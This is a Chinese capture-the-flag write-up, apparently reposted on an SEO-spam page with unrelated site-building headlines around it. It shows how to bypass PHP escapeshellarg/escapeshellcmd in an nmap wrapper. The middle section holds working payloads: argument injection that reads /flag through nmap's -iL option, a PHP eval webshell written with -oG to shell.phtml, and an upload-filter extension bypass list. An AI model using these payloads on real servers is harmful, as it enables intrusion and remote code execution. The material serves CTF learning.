当前位置: 首页 > news >正文

天津做网站优化百度上面如何做网站

天津做网站优化,百度上面如何做网站,软件开发的收官之战是什么,装饰设计公司起名这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里PHP escapeshellarg()escapeshellcmd() 之殇 (seebug.org) 两种解题方法: 第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入we…

这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里PHP escapeshellarg()+escapeshellcmd() 之殇 (seebug.org)

两种解题方法:

第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell

-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式

第一种:

这道题首先我们在注释里面看到了flag存放的位置

可以利用nmap 的-iL参数读取flag到一个文件中,我们再访问生成的文件即可

构造一个payload:

127.0.0.1' -iL /flag -o haha
经过escapeshellarg函数后
'127.0.0.1'\'' -iL /flag -o haha'(将单引号转义并用一对单引号包裹起来,再将这个语句用单引号包裹起来确保只有一个参数)
经过escapeshellcmd函数后
'127.0.0.1'\\'' -iL /flag -o haha\'
对\转义,在许多编程语言中,反斜杠被用作转义字符,用来表示特殊字符或序列。这里面两个相邻的反斜杠\表示一个单独的反斜杠字符,没有转义作用。而末尾单引号转义过后的普通字符仍然是它本身,没有变化,会被视为普通字符不具有单引号的作用了
这样就分为了三部分'127.0.0.1'和''连接空白和-iL /flag -o haha'(最后这个单引号只有一个不起作用,但它将最后的文件名变为了haha')
nmap既可扫描前面的ip,又能执行-iL /flag -o haha'

ip中输入,因为'127.0.0.1'\\执行的时候会被简化为127.0.0.1\,这个ip就错了,但是不用管报错,只要后面命令执行了我们就能访问到

记住文件名变为了haha'   直接访问即可看到flag

第二种

正常利用nmap参数-oG写一句话木马:127.0.0.1 | <?=@eval($_REQUEST['cmd']);?> -oG shell.php

显然有东西被过滤,多半是php的原因

用我这个后缀名字典burp爆破后缀发现还是有很多能用的,我们这里就用phtml了

php
php2
php3
php4
php5
pHp
pHp2
pHp3
pHp4
pHp5
html
htm
phtml
pht
Html
Htm
pHtml
asp
aspx
asa
asax
ashx
asmx
cer
aSp
aSpx
aSa
aSax
aScx
aShx
aSmx
cEr
jsp
jspa
jspx
jsw
jxv
jspf
jtml
JSp
jSpx
jSpa
jSw
jSv
jSpf
jHtml
asp/test.jpg
asp;.jpg
cer/test.jpg
cer;.jpg
asa/test.jpg
asa;.jpg
aSp/test.jpg
aSp;.jpg
cEr/test.jpg
cEr;.jpg
aSa/test.jpg
aSa;.jpg
jpg/xx.php
jpg/xx.pHp
jpg/.php
jpg/.pHp
php.xs.aa
php2.aa
php3.aa
php4.aa
php5.aa
pHp.aa
pHp2.aa
pHp3.aa
pHp4.aaa
pHp5.aa
html.aa
htm.aa
phtml.aa
pht.aaa
Html.aaa
Htm.aa
pHtml.aa
php::$DATA

构造payload:127.0.0.1 | ' <?=@eval($_POST["cmd"]);?> -oG shell.phtml '

蚁剑直接连上

escapeshellcmd函数只会转义一些特殊字符,如单引号、双引号、反斜杠等,以防止它们被误解为命令的一部分。它并不会对<?=@eval($_POST[cmd]);?>中的特殊字符进行转义,因为这个字符串看起来更像是PHP代码片段,而不是外部命令参数。

http://www.sczhlp.com/news/51851/

相关文章:

  • 包头网站开发公司seo搜索引擎优化求职简历
  • 专业做招聘的网站有哪些济南行知网站建设有限公司怎么样
  • 做淘宝客网站域名是别人的dw做网站需要数据库么
  • 好的免费网站建站平台郑州官网网站优化公司
  • 青岛建设网站企业做流量网站有收入吗
  • 做网站需要投资多少钱wordpress 去掉作者信息
  • 家装建材公司网站建设哈尔滨招标信息网官网
  • 阿里巴巴做特卖的网站沙朗做网站公司
  • 济南建设网站需要国家企业信用信息系统年报入口
  • 各省网站备案时长discuz做资讯网站
  • 网站备案 失败哪些网站可以做微课
  • 邯郸推广网站建设哪个好建站服务器
  • 房地产交易网站模版领导高度重视网站建设
  • 9.10.2 Mark Sweep 垃圾收集器
  • app大全软件网站免费下载百度首页快速排名系统
  • 专门做丝印反查的收费网站一键生成网站的软件
  • app网站模板红包网站开发
  • 专门教做衣服的网站东莞高端品牌网站建设
  • 住房和城乡建设岗位评定网站网站 框架
  • p2p网站开发多少钱wordpress 代码臃肿
  • 做网站难吗做网站策划遇到的问题
  • 网站开发工具链接服务器设计软件免费下载官方网站
  • docker学习笔记2 mysql主从
  • 建网站要定制还是第三方系统专业从事网站开发公司
  • 手机网站做多宽的图片室内设计学校哪些
  • 本地电脑做服务器建网站黑龙江建设集团网站
  • 营销最好的网站建设公司网站搭建中页面
  • c 网站开发环境中山网红打卡点
  • 贵阳做网站需要多少钱桂林旅游网页设计
  • 国外商业网站设计如何做网站的教程